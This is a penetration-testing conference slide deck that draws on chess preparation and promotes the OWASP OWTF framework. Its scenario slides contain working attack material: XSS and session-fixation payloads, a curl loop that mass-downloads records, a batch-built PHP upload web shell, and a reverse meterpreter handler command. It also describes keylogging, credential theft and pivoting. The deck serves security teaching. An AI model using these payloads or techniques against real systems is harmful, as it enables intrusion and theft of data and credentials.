  • 33. Practical Tips “Just” (!) don’t stop: • Find things that motivate YOU and listen, etc to that: Search youtube for “motivation”, get mp3 from video, etc. • Read a lot: papers, presentations, PoCs, etc • Watch a lot: Webinars, Talks, demos • Practice a lot: Focus on what interests/motivates you • Listen a lot: InfoSec podcasts Podcasts are awesome to keep learning while you do you non-intellectual activities such as: Cooking, cleaning, tidying-up, driving, etc If you are a podcaster: Minimise the fillers or you’ll lose your audience (skipping is annoying + unpractical while driving, etc)
  • 34. Don’t Fry your CNS If you work hard be careful you don’t fry your CNS: Your central nervous system (CNS) has finite recovery ability You know you’ve fried your CNS when: • You (surprisingly) get sick • Your mental/physical performance drops • Caffeine doesn’t work • You feel like you need to sleep all day: tiredness, etc If this happens you need to: • Sleep without alarms for 10 days (try 1 x week after fix) • Clean-up your diet + Exercise • Caffeine: Avoid it or cycle it Cycle caffeine on and off: Use “on” days and “off” days Use caffeine early in the day: Clear it fully before sleep!
  • 35. Suggested watching Awesome talk explaining what it takes to build up individual skill: Haroon Meer - You and Your Research http://www.youtube.com/watch?v=JoVx_-bM8Tg Also worth a look: http://www.slideshare.net/reidhoffman/startup-of-you- visual-summary
  • 36. 2. Game Preparation Can happen: • Before the game / pentest: Goals: • Scope better • Do better 2) During a tournament / pentest: Goals: • React to the unexpected • Avoid detection • Prepare an attack
  • 37. Chess Player approach Chess players: • Memorise openings • Memorise endings • Memorise entire lines of attack/defence • Try hard to analyse games efficiently Pen tester translation: • Chess players precompute all they can • Chess players analyse info only once Chess player prep (simplified ☺): 1. Find + prep exploits for opponent weaknesses 2. Precompute an obscure opening: best replies analysed at home for weeks/months 3. Kick the opponent out of precomputation with it
  • 38. Alekhine vs Capablanca World Championship Match 1927
  • 39. Alekhine vs Capablanca World Championship Match 1927 .. Alekhine's victory surprised almost the entire chess world. Capablanca entered the match with no technical or physical preparation, while Alekhine got himself into good physical condition, and had thoroughly studied Capablanca's play. According to Kasparov, Alekhine's research uncovered many small inaccuracies. Luděk Pachman suggested that Capablanca, who was unaccustomed to losing games or to any other type of setback, became depressed over his unnecessary loss of the eleventh game.. http://en.wikipedia.org/wiki/Jos%C3%A9_Ra%C3%BAl_Capablanca Physical Prep + Opponent Research + Mental toughness = WIN
  • 40. Garry Kasparov vs Nigel Short World Championship Match 1993
  • 41. July 1993 FIDE (ELO) rating list. Top 10 players 1 Kasparov, Gary.................... RUS 2815 stronger 2 Karpov, Anatoly................... RUS 2760 … 10 Short, Nigel...................... ENG 2665 weaker http://chess.eusa.ed.ac.uk/Chess/Trivia/AlltimeList.html “In 1993 Nigel Short played Garry Kasparov .. Nigel Short had won matches against former world champion Anatoly Karpov and Jan Timman on his way to meeting Kasparov.” http://www.supreme-chess.com/famous-chess-players/nigel-short.html Match Context
  • 42. Nigel Short’s Prep surprises Kasparov “Kasparov was evidently disoriented as he used 1 hour 29 minutes to Short's 11 minutes(!) for the entire game.“ Short (weaker) was 8 times faster http://www.chessgames.com/perl/chessgame?gid=1070677
  • 43. Kasparov + team strike back “In just (!) 9 days after facing it for the first time … Kasparov and his team had found the best reply (11.Ne2 ) and even succeeded in completely bamboozling Short with 12.Be5” “This move was a surprise for me. I spent 45 minutes on my reply. I could not fathom out the complications … “ – Nigel Short http://www.chessgames.com/perl/chessgame?gid=1070681
  • 44. Anti-Chess Prep: Random Chess Fischer complained … that because of the progress in openings and the memorization of opening books, the best players from history, if brought back from the dead to play today, would no longer be competitive. "Some kid of fourteen today, or even younger, could get an opening advantage against Capablanca" http://en.wikipedia.org/wiki/Bobby_fischer#Fischer_Random_Chess
  • 45. Pwn2Own: Headlines vs. Prep Headline “Apple's Leopard hacked in 30 seconds” http://www.zdnet.com/apples-leopard-hacked-in-30-seconds-1339287733/ Reality Charlie Miller on his own prep (2008): “… It took us a couple of days to find something, then the rest of the week to work up an exploit and test it. It took us maybe a week altogether” http://www.roughlydrafted.com/2008/03/29/mac-shot-first-10-reasons-why- cansecwest-targets-apple/ Bottom line 1 week of prep for a 30 second attack
  • 46. Pwn2Own: Stephen Fewer’s prep “Fewer says that the successful exploit required use of three separate vulnerabilities: • Two to achieve successful code execution within the browser • and then a third to escape Internet Explorer's Protected Mode sandbox. Putting together the successful attack took Fewer five to six weeks.” http://arstechnica.com/security/2011/03/pwn2own-day-one-safari-ie8-fall-chrome-unchallenged/
  • 47. Chris Nickerson on Prep “.. If you do the proper intelligence gathering you can plan an attack that will work and I say that because you will NOT get stopped: … if you get stopped, it is your fault for not doing enough intelligence gathering so remember it next time” http://blog.securityactive.co.uk/2009/10/19/chris-nickerson-red-and-tiger-team-testing-brucon-2009/ - min ~16
  • 48. Kevin Mitnick’s Prep “.. we can setup their environment in our lab, and …we can …exploit our own environment … this was doing a lot of work prior to the attack: Finding out the AV, finding out the target system and working on bypassing UAC before the client was even hit … And then when we did the attack it worked flawlessly the first time … I think the upfront preparation is really critical to be successful in this stuff” http://vimeo.com/31663242 - minutes: ~19 + 32:48
  • 49. OSCP results from 2008 24h hacking challenge: Nessus, etc. forbidden, scripts ok. 9-10 hours (test)19 hours (test) 5 hours (sleep) 24 hoursTime 100%100% WTF?FAIL WTF?Game performance ? (less than me?) 1-1,5 months (with a day job) 0? (maybe only studying?) Game prep 7? (12 in 2013)< 1 year (weak!) 5-10 years?Individual Skill Matteo Memelli (ryujin) Me (1st try)2 x respected Security Pros Strength of Play Matteo was x2 faster, but you can’t get more than 100% ☺ Game prep was critical to outperform stronger test takers
  • 50. My Strategy: Serious prep Knowing myself (Pre-prep self-feelings at the time) • Strength: Coding (dev background = edge over net guys) • Top Likely Weakness: Time (weaker = slower) Knowing the “enemy” (The 24 hour hacking challenge) • Tough test: Most people failed (based on IRC) • Scripts allowed, Nessus, etc forbidden • Watch purehate’s videos, for ideas, etc really helpful Battle prep plan • Heavy Scripting: Reduce time for uncreative work • Heavy Practice: Necessary to be faster on more creative/harder to automate work (exploitation, escalation, etc). All exercises, extra miles, etc. • Podcast Abuse: 3 years of PaulDotCom in 1 month!
  • 51. Script 1: Prober Probe more likely open ports first until a full scan complete: • 1st wave: scan + probe top 100 TCP ports + SNMP (awesome) results in 5 minutes! • 2nd wave: scan + probe next 900 TCP ports + few UDP • 3rd wave: scan remaining TCP ports (slower) • 4th wave: scan remaining UDP ports (super-slow) • For each wave: Group report 1 thing to look at Summary: • Staged: Fast results (5-10 minutes for 1st wave) • Reliable: Even monitored free RAM, etc. before launching things (to avoid crashing my own machine!) • Auto-Pilot: No supervision required (!babysitting)
  • 52. Script 2: Reporter A separate script generated partial reports at any time: I could see the partial probing results and work from there very quickly though a clickable web page. No waiting until all the probes finished. critical
  • 53. The Advantage of organised info Others spent valuable energy to run (a lot of) tools by hand (12+ terminals open to babysit, etc)… … I had this in < 10 minutes via scripts!:
  • 54. When Prep FAILs Whatever you do prep will fail sooner or later Option 1) Take the hit: Consider nights, weekends, etc. this will pay off in the test and your future assessments, view it as a "paid training opportunity“ Option 2) Ask for an extension: Find a good reason + Negotiate an extension with your customer Option 3) Ask for a delay: Take the hit without disrupting your life that much (maybe ☺) Option 4) All of the above ☺
  • 58. Mental Toughness: Karpov Karpov: World Champion 1975–85… “.. I could resist in positions where other players probably would resign. And I was finding interesting ideas on how to defend difficult positions and I could save many games. ..I never gave up … you try to find the best move whatever the position is, because many people they say, okay, this is bad and then they lose will to fight. I never lost the will to fight.” http://bigthink.com/videos/the-value-of-mental-toughness
  • 59. Efficient Chess Analysis From Alexander Kotov - "Think like a Grandmaster": 1) Draw a list of candidate moves (3-4) 1st Sweep (!deep) 2) Analyse each variation only once (!) 2nd Sweep (deep) 3) After step 1 and 2 make a move 1) Draw up a list of candidate paths of attack 2) Analyse [ tool output + other info ] once and only once 3) After 1) and 2) exploit the best path of attack Ever analysed X in depth to only see “super-Y” later?
  • 60. In 5 minutes Putting it all together:
  • 61. Plugin Types (-t) At least 50% (32 out of 64) of the tests in the OWASP Testing guide can be legally* performed at least partially without permission * Except in Spain, where visiting a page can be illegal ☺ * This is only my interpretation and not that of my employer + might not apply to your country!
  • 62. A Pentester “cheating try” Offensive (Web) Testing Framework = Multi-level “cheating” tactics
  • 63. OWTF’s Chess-like approach Kasparov against Deep Blue - http://www.robotikka.com
  • 64. Scenario 1: Summary Pre-Engagement: No permission to test Game prep 1) Run passive plugins legit + no traffic to target Sitefinity CMS found 2) Identify best path of attack: • Sitefinity default admin password • Public sitefinity shell upload exploits Engagement: Permission to test Game performance 1) Try best path of attack first
  • 66. Scenario 1: Outcome !!1 minute after getting permission …
  • 67. Scenario 1: Outcome !!5 minutes after getting permission …
  • 68. Scenario 2: Summary Attack preparation (pre-engagement safe) Game prep 1) Run semi-passive plugins legit Missconfigured crossdomain, fingerprint wordpress version 2) Identify best path of attack: crossdomain + phishing + wordpress plugin upload + meterpreter 3) Replicate customer environment in lab 4) Prep attack: Adapt public payloads to target 5) Test in lab Launching the attack Game performance 1) Tested attack works flawlessly on the first shot 2) Pivot 3) Show impact
  • 70. Scenario 3: Summary Pre-Engagement: No permission to test Game prep 1) Mapping the application you notice ….. https://target.com/reports/rwservlet/ Auth bypass vuln by design: Oracle reports accessible without auth 2) Identify best path of attack: Use the reporting GUI ☺ Engagement: Permission to test Game performance 1) Pwn customer on “minute 1”: Use the reporting GUI ☺
  • 73. Scenario 3: Vuln Examples ☺
  • 74. Scenario 4: Summary Pre-Engagement: No permission to test Game prep 1) .NET app: OMG they have a firewall ☺ 2) Hmm they also have an XML file upload! 3) Identify best path of attack: XSS via encoded field in XML file upload &lt;iframe onload=&quot;javascript:ALERT('OWNED')&quot; src=&quot;http://www.google.com&quot;&gt;&lt;/iframe&gt; Engagement: Permission to test Game performance 1) Pwn customer on “minute 1”: Persistent XSS via XML upload
  • 76. Scenario 5: Summary Pre-Engagement: No permission to test Game prep • File upload check: Can upload doc files 2) Noting URL: http://target.com/attachments/..........._test.doc 3) Log out 4) Try to get uploaded file: Success Auth bypass 5) Prepare attack: Write script to download all documents Engagement: Permission to test Game performance 1) Pwn customer on “minute 1”: Run script
  • 77. Scenario 6: Summary 1) Session Id does not change after login 2) Got XSS 3) Prepping XSS + Session fixation exploit: https://target.com/sample.php?Code='><script> document.cookie='PHPSESSID=3ssc1h5464qonvhuq3gm5u49q6; path=/'; window.location='https://target.com/login/'; </script><br Bottom line: Session fixation through XSS is possible
  • 78. Scenario 7: Summary 1) Site A makes a request to Site B with NO security tokens 2) Site A retrieves sensitive info from Site B using 1) 3) Problem verification: curl --referer 'https://target.com/demo.php' http://target2.com/demo.jsp?userid=xxxxxxx&examid=xxxxxxxx | lynx --dump -stdin|more Quick Exploit: Downloads arbitrary exam reports.. for i in $(php -r 'echo implode(" ",range(11200,16000));'); do echo "Trying $i .."; curl … > tmp.html ; BAD=$(grep '500 - Internal server error' tmp.html|wc -l); if [ $BAD -eq 0 ]; then cp tmp.html $i.html; # Got a hit fi done
  • 79. Scenario 8: AppSec2NetSec 1) Initial scope: 1 app server on cloud provider 2) File Upload vuln 3) Getting a nice shell 4) Run keylogger 5) Mapped hosts 6) Reused passwords 7) Pwned 17 servers (GUI access on 16) 8) No admin detected the attack ☺
  • 80. Scenario 8: AppSec2NetSec 2) Classic File upload, Null character and shell Small gotcha: Image had to be valid so I used a GIF file with PHP code in the comment (using GIMP)
  • 81. Scenario 8: AppSec2NetSec 3) Shell is only the beginning, you know? ☺ In windows, by default (i.e. next / next / finish install) Apache runs as SYSTEM, i.e. more than Admin, no need to escalate ☺
  • 82. Scenario 8: AppSec2NetSec 3) Getting comfortable (no tftp, etc) Creating a file upload PHP shell from a DOS shell.. NOTE: “^” is a escape character in windows echo ^<?php > file_upload.php echo if (isset($_POST['Action']) ^&^& $_POST['Action'] == 'go') { >> file_upload.php echo if (@move_uploaded_file($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']) == false) { >> file_upload.php echo die('Error when uploading: '.$_FILES['MyFile']['error']); >> file_upload.php echo } >> file_upload.php echo else { >> file_upload.php echo echo 'upload ok!'; >> file_upload.php echo } >> file_upload.php echo } >> file_upload.php echo ?^> >> file_upload.php echo ^<html^>^<form action="" enctype="multipart/form-data" name="myform" id="myform" method="post"^>^<input type="hidden" name="Action" value="go" /^> ^<input type="file" name="MyFile" id="MyFile" value="" size="80" maxlength="255" /^>^<input type="submit" name="send" value="Submit" /^>^</form^>^</html^> >> file_upload.php
  • 83. Scenario 8: AppSec2NetSec 3) Now we’re ready to upload a reverse meterpreter shell ☺
  • 84. Scenario 8: AppSec2NetSec Check before meterpreter upload: AV Fingerprint via ‘tasklist’
  • 85. Scenario 8: AppSec2NetSec You are totally blocking port 80 outbound, huh? ☺ # /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.0.127 LPORT=80 E …
  • 86. Scenario 8: AppSec2NetSec LM hashes were disabled, NT LM hashes were tough to crack .. Time to improvise
  • 87. Scenario 8: AppSec2NetSec Map network with arp –a, etc via winenum: winenum is very scary…
  • 89. Scenario 8: AppSec2NetSec No need to crack our own password ☺
  • 90. Scenario 8: AppSec2NetSec If you can’t crack passwords you might be able to steal them.. Patience is worth its prize…
  • 91. Scenario 8: AppSec2NetSec While you are waiting, you might as well dump memory..
  • 92. Scenario 8: AppSec2NetSec Pivoting around using stolen passwords..
  • 93. Scenario 8: AppSec2NetSec Pivoting .. Where? ☺ Approach 1) Run History
  • 94. Scenario 8: AppSec2NetSec Approach 2) Merge winenum info PASSIVE Ping Sweep: Unique IPs & MACs from the ARP table of all popped boxes via winenum
  • 95. Scenario 8: AppSec2NetSec PASSIVE Local “Port scanning” from winenum
  • 96. Scenario 8: AppSec2NetSec Don’t forget about IPv6 & UDP ☺
  • 97. Scenario 8: AppSec2NetSec PASSIVE Remote “Port scanning” from winenum via active connections
  • 98. Scenario 8: AppSec2NetSec Admin shares (c$, d$, etc), SSL private keys, ..
  • 99. Scenario 8: AppSec2NetSec So you have hard-coded credentials in your scripts?
  • 102. Scenario 8: AppSec2NetSec Seeing the shares thanks to your script credentials:
  • 103. Scenario 8: AppSec2NetSec Does your application store user credentials in clear-text on the user session files?
  • 105. Scenario 8: AppSec2NetSec And my personal favourite (only had to click OK ☺):
  • 106. Conclusion 3 Strength Factors: 1) Individual Skill • Skill > Intelligence + Talent (Hard work beats talent) • Hack your subconscious (!mental barriers) • Don’t stop: Eat it, breathe it, sleep it 2) Game preparation • Prep ahead: Recon + analysis + plan • Scope like a pro: Negotiate scope, extensions, etc. 3) Game performance • 1st Sweep: Shallow + wide analysis first • 2nd Sweep: Deep + narrow analysis of best options • Analyse only once •Don’t lose the will to fight + Take the hit
  • 107. Thanks to Brucon 5by5 Brucon 5by5 sponsorship of OWASP OWTF http://blog.brucon.org/2013/02/the-5by5-race-is-on.html
  • 108. Thanks to OWASP GSoC 2013 Google Student sponsorship of OWASP OWTF https://www.owasp.org/index.php/GSoC Student Proposals: April 22th-May 3rd 2013 Still on time!
  • 109. Special thanks to OWASP Testing Guide contributors Finux Tech Weekly – Episode 17 – mins 31-49 http://www.finux.co.uk/episodes/mp3/FTW-EP17.mp3 Finux Tech Weekly – Episode 12 – mins 33-38 http://www.finux.co.uk/episodes/mp3/FTW-EP12.mp3 Exotic Liability – Episode 83 – mins 49-53 http://exoticliability.libsyn.com/exotic-liability-83-oh-yeah Eurotrash 32: http://www.eurotrashsecurity.eu/index.php/Episode_32 Adi Mutu (@an_animal), Andrés Riancho (@w3af), Bharadwaj Machiraju, Gareth Heyes (@garethheyes), Krzysztof Kotowicz (@kkotowicz), Marc Wickenden (@marcwickenden), Marcus Niemietz (@mniemietz), Mario Heiderich (@0x6D6172696F), Michael Kohl (@citizen428), Nicolas Grégoire (@Agarri_FR), Sandro Gauci (@sandrogauci)
  • 110. Q&A Abraham Aranguren @7a_ @owtfp abraham.aranguren@owasp.org http://7-a.org http://owtf.org Project Site (links to everything): http://owtf.org • Try OWTF: https://github.com/7a/owtf_releases • Try a demo report: https://github.com/7a/owtf_demos • Documentation: https://github.com/7a/owtf/wiki • Contribute/Download: https://github.com/7a/owtf